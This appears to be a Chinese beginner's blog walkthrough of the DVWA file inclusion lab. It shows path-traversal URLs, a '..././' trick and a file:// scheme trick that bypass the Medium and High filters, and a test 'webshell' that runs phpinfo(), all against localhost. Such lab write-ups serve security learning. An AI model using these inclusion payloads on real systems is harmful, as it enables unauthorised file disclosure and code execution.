今天带来第四期文件包含漏洞操作记录。初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。也感谢之前查阅的各种大神提供的博客。

php文件包含分为两种:

本地文件包含LFI(Local File Inclusion) 当被包含的文件在服务器本地时,就形成本地文件包含

远程文件包含RFI(Remote File Inclusion) 当被包含的文件在第三方服务器时,叫做远程文件包含

Low级别

本地文件包含方法:

分别点击三个php文件,后缀为page=文件名

将后缀修改为,得到了绝对路径

phpinfo.php

远程文件包含方法:

编写一句话木马文档,命名为webshell.txt

<?php phpinfo();?>

利用文件上传的原理

将后缀命改为

http://127.0.0.1/vulnerabilities/fi/?page=../../hackable/uploads/webshell.txt

Medium级别

分析源码,将../ ..\过滤,我们可以使用.../代替


<?php// The page we wish to display
$file = $_GET[ 'page' ];// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );?>

将后缀修改为

​
http://127.0.0.1/vulnerabilities/fi/?page=..././..././hackable/uploads/webshell.txt​

Hight级别

分析源码,要求page参数为file形式


<?php// The page we wish to display
$file = $_GET[ 'page' ];// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {// This isn't the page we want!echo "ERROR: File not found!";exit;
}?>

在G盘下新建一个文件,命名为webshell.php  内容为:

<?php phpinfo();?>

将后缀名修改为

http://127.0.0.1/vulnerabilities/fi/?page=file://G:/webshell.php

DVWA(4)文件包含(File Inclusion) LOW-HIGHT 操作记录相关推荐

  1. DVWA通关--文件包含(File Inclusion)

    目录 LOW 通关步骤 一.本地文件包含 二.远程文件包含 代码分析 MEDIUM 通关步骤 一.本地文件包含 二.远程文件包含 代码分析 HIGH 通关步骤 一.本地文件包含 二.远程文件包含 代码 ...

  2. DVWA远程文件包含防御

    在这里推荐下自己的博客,支持友链互换,Back's Blog 本次防御从代码层面出发, 尽量从多个角度进行防御.不足之处请指出.谢谢. 黑名单检测防御 首先看下dvwa的远程文件包含页面源码(low级 ...

  3. pikachu File Inclusion 文件包含漏洞 (皮卡丘漏洞平台通关系列)

    目录 一.来自官方的简介 二.来自小可爱的通关步骤 第一关  File Inclusion(local) 1.读取"隐藏"文件 2.读取系统文件 3.结合文件上传getshell ...

  4. LFI(本地文件包含)、RFI(远程文件包含)、PHP封装协议(伪协议)安全问题学习

    友情链接:https://www.cnblogs.com/LittleHann/p/3665062.html 目录 一.文件包含的基本概念 1.要想成功利用文件包含漏洞,需要满足下面的条件 (1)in ...

  5. 【web安全】文件包含漏洞

    目录 1.什么是文件包含漏洞 2.产生原因 3.文件包含的类型 3.1本地文件包含 3.2远程文件包含 4.攻击利用手法 4.1 file:协议 4.2 php://协议 ​4.3 zip://,bz ...

  6. 文件包含和命令注入漏洞

    文件包含和命令注入漏洞 文件包含漏洞 介绍 文件包含漏洞是代码注入的一种.其原理就是注入一段用户能控制的脚本或代码,让服务器端执行,代码注入的典型代表就是文件包含file inclusion.文件包含 ...

  7. 【文件包含漏洞-02】文件包含漏洞分类与原理及其空字符安全绕过实验

    文件包含漏洞 文件包含(file inclusion)漏洞,当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include ...

  8. DVWA靶机-文件上传漏洞(File Upload)

    DVWA靶机-文件上传漏洞(File Upload) 文件上传漏洞的四个等级,low,medium,high,impossible,今天我们针对于不同的等级进行基于文件上传漏洞的攻击 DVWA靶机-暴 ...

  9. DVWA——文件包含

    File Inclusion学习 文件包含简介 实战:DVWA--文件包含 文件包含简介 一.文件包含简介: 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执 ...

最新文章

  1. mysql 流复制_MySQL系列详解六:MySQL主从复制/半同步演示-技术流ken
  2. iShow UI for React 最佳实践
  3. Python基础教程:函数的可变参数
  4. 一个springboot能支持多少并发_吃透这篇,你也能搭建出一个高并发和高性能的系统...
  5. SQLite入门之数据类型
  6. 计算机考研没奖,备战考研本科期间没有什么奖项,考研复试会有影响吗?
  7. windows软链接的建立及删除
  8. SpringBoot 中 @Transactional 的使用
  9. python求解LeetCode习题Compare Version Numbers
  10. ae效果英文版翻译对照表_AE中英文对照
  11. 计算机电子智能化贰级,电子与智能化工程专业承包资质分为一级、二级
  12. ov5640帧率配置_ov5640不改变pclk的情况下,通过缩小输出图像大小来提高输出帧率...
  13. frida-trace入门
  14. 记参加Microsoft Ignite 大会和北京CSDN创作者之夜
  15. 6个Web前端值得收藏很实用的菜单模板(上)
  16. 桌面计算机密码修改频率,教大家如何更改电脑的显示频率
  17. ajax爬虫小案例(百度翻译)
  18. python爬虫安装教程_环境安装-Python 原生爬虫教程 | IT大叔
  19. MT7603处理器性能,MT7603 wifi芯片介绍
  20. opencv2 加载RTSP视频流,内存溢出的问题

热门文章

  1. 安徽工程大学计算机考研分数线,2021安徽工程大学研究生分数线一览表(含2019-2020历年复试)...
  2. Eclipse OSBP 设置 配置
  3. SLAM算法知识荟萃
  4. stm32关定时器_【菜鸟必看】stm32定时器的妙用
  5. 自动驾驶算法详解(1) : Apollo路径规划 Piecewise Jerk Path Optimizer的python实现
  6. 【每日一题】 1396. 设计地铁系统
  7. 读书笔记-《水煮三国》
  8. 影视解析Xyplayer 3.94源码
  9. 科笛上市一度破发:公司市值67亿港元 红杉与云锋是股东
  10. eclipse maven配置usersetting时出现Could not read settings.xml